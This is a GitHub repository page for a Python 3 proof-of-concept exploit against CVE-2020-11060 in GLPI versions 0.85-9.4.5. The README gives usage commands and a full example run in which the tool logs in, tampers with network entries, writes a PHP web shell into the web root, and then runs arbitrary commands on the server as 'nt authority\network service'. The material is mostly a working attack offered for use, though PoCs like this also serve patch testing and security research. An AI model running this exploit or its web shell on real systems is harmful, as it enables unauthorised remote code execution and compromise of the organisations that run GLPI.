Skip to content

0xdreadnaught/cve-2020-11060-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits

CVE-2020-11060.py

CVE-2020-11060.py

 
 

README.md

README.md

 
 

Repository files navigation

CVE-2020-11060

This script is a Python 3.x based exploit for CVE-2020-11060 in GLPI versions 0.85-9.4.5.

Original implementation: 0xdreadnaught

Python3 refactoring: n3rada

The original PoC in ExploitDB is now deprecated since it used Python 2.x. The new version has been submitted, and a link will be added here if/when it's accepted. The original vulnerability research used to build these PoCs conducted by AlmondOffSec, and can be found here.

Usage

python3 CVE-2020-11060.py --url 'http://<target URL>' --user <'user'> --password <'password'> --platform <win/nix> --offset <#>

Example Output

python3 CVE-2020-11060.py --url 'http://glpi.vul.ne' --user 'glpi_adm' --password 'Amvfd6565/432' --platform 'win' --offset 312

[+] GLPI Browser targeting 'http://glpi.vul.ne' ('windows') with following credentials: 'glpi_adm':'Amvfd6565/432'.
[+] Target is up and responding.
[+] User 'glpi_adm' is logged in.
------------------------- trial number 1 -------------------------
[*] Wiping networks...
        Deleting network id: 2413
[+] Network created
[+] Modifying network
        New ESSID: RCEe
[+] Current shellname: bQznfdTr.php
[*] Dumping the database remotely at: C:\xampp\htdocs\sound\bQznfdTr.php
[+] File 'dumped', accessible at: http://glpi.vul.ne/sound/bQznfdTr.php
[+] Shell size: 265
------------------------- trial number 2 -------------------------
[*] Wiping networks...
        Deleting network id: 2414
[+] Network created
[+] Modifying network
        New ESSID: RCEee
[+] Current shellname: HdqrmKtR.php
[*] Dumping the database remotely at: C:\xampp\htdocs\sound\HdqrmKtR.php
[+] File 'dumped', accessible at: http://glpi.vul.ne/sound/HdqrmKtR.php
[+] Shell size: 13882
------------------------- trial number 3 -------------------------
[*] Wiping networks...
        Deleting network id: 2415
[+] Network created
[+] Modifying network
        New ESSID: RCEeee
[+] Current shellname: dwmfIJgN.php
[*] Dumping the database remotely at: C:\xampp\htdocs\sound\dwmfIJgN.php
[+] File 'dumped', accessible at: http://glpi.vul.ne/sound/dwmfIJgN.php
[+] Shell size: 13885
------------------------- trial number 4 -------------------------
[*] Wiping networks...
        Deleting network id: 2416
[+] Network created
[+] Modifying network
        New ESSID: RCEeeee
[+] Current shellname: KmGsYHBw.php
[*] Dumping the database remotely at: C:\xampp\htdocs\sound\KmGsYHBw.php
[+] File 'dumped', accessible at: http://glpi.vul.ne/sound/KmGsYHBw.php
[+] Shell size: 8369
------------------------------------------------------------------
[+] RCE found after 4 trials!
[+] You can execute command remotely as: nt authority\network service@WIN03
[+] Run this tool again with the desired command to inject:
        python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'desired_command_here'

After that, you can execute a command freely like:

python3 CVE-2020-11060.py --url 'http://glpi.vul.ne/sound/KmGsYHBw.php' --command 'whoami'

And it will return:

[*] Response received from 'http://glpi.vul.ne/sound/KmGsYHBw.php':

nt authority\network service

About

Python3 POC for CVE 2020-11060

Resources

Readme
Activity

Stars

6 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages